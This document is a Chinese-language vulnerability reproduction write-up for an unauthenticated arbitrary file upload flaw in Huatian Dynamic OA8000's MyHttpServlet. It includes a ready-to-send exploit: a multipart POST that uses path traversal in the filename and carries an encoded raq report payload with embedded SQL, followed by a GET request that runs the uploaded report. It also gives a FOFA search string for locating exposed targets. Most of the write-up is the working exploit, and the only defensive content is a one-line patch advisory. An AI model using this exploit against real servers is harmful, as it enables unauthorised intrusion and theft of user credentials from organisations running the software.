0x01 产品简介
华天动力OA是一款将先进的管理思想、 管理模式和软件技术、网络技术相结合,为用户提供了低成本、 高效能的协同办公和管理平台。
0x02 漏洞概述
华天动力OA MyHttpServlet 存在任意文件上传漏洞,未经身份认证的攻击者可上传恶意的raq文件并执行raq文件中的任意sql语句,获取用户账号密码等敏感信息。
0x03 影响范围
OA8000平台版 DLHT-OA8000-3-0-7.2-3-1-0-500
0x04 复现环境
FOFA:app="华天动力-OA8000"
0x05 漏洞复现
exp:
POST /OAapp/MyHttpServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=9b0af0d79eaea67c3aa1889b0b43a50a
Accept-Encoding: gzip
Content-Length: 2428
--9b0af0d79eaea67c3aa1889b0b43a50a
Content-Disposition: form-data; name="file"; filename="\\Temp\\../../../report/reportFiles/d4f0fE.jpg"
{{unquote("RQQR\x00\x00\x01\xf5\x00\x00\x00\x02\x00\x02\x00\x00\x00\x1c\xa5A\x00\x00\x00\x01\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x06\xac\xed\x00\x05pp\x00\x00\x00\x1b\xb1B\x18ff\x01\x00\x00\x00\x00\x02\x00\x00\xff\xff\xff\xff\x00\x00\x00\x06\xac\xed\x00\x05pp\x00\x00\x00\xac\xff\xff\xff\xff\xd0\xe1P\xff\x00\x00\x00?\x80\x00\x00\x10\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\"1\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xf8Dialog\x00\x0c\xff\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xffP?@\x00\x00\xff\x00\x00\x00P?@\x00\x00\xff\x00\x00\x00P?@\x00\x00\xff\x00\x00\x00S?@\x00\x00\xff\x00\x00\x00\x00\x00\x00\x15\x00\x01\x28\x01\x00\x0f ds1.select\x28#1\x29\x00 \xc0\xff\xff\xff\xff\x00\x00\xff\xff\xff\xff\x00\x00\x00\x06\xac\xed\x00\x05pp\xff\xff\xff\xff\x00\x00\x00\x00\x00;\x00\x09\x00\x01\x00\x01\x00\x01\x00\x00\x00\x14\x00\x01\x00\x01\x00dCR\x00\x00C\x94\x80\x00A\x98\x00\x00A\x98\x00\x00A\xc8\x00\x00A\xc8\x00\x00\x01\x00\x00\x02\x00\x00\x02\x00\x02\x01\x01\x00\x00\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00s\x00\x01\x01\xff\xff\xff\xd0com.runqian.report4.usermodel.SQLDataSetConfig\x00\x00\x00:\x00\x00\x00\x17\xff\xff\xff\xfbds1\xff\xff\xff\xfahtoa\xff\xff\xff\xfe\x00\x01\x00\x00\xff\xff\xff\xf1SELECT user\x28\x29\xff\xff\xff\xfe\xff\xff\xff\xfe\xff\xff\xff\xff\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x0a\x00\xff\xff\xff\xfe\x0b\x00\x00\x00\x00\x00\x00\x00\x12\xff\xff\xff\xfe\xff\xff\xff\xfe\x00\x00\x0f<\xff\xff\xff\xfe\x03\x01\x00\x00\x00d\x01\xff\xff\xff\xfe\x00\xff\xff\xff\xfe\xff\xff\xff\xff\xff\xff\xff\xfeRQQRRQQR\x1e\xf9\xb0\xac\xda\x8d\x80s\x83\xf4h\xc5\xc0#\xb4\xeb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")}}
--9b0af0d79eaea67c3aa1889b0b43a50a--
PS:文件中的SQL语句是查询数据库当前用户
查看结果
GET /report/reportJsp/showHTReport.jsp?reportFile=上传的文件名 HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0x06 修复建议
目前厂商已发布安全补丁,请及时更新:http://www.oa8000.com。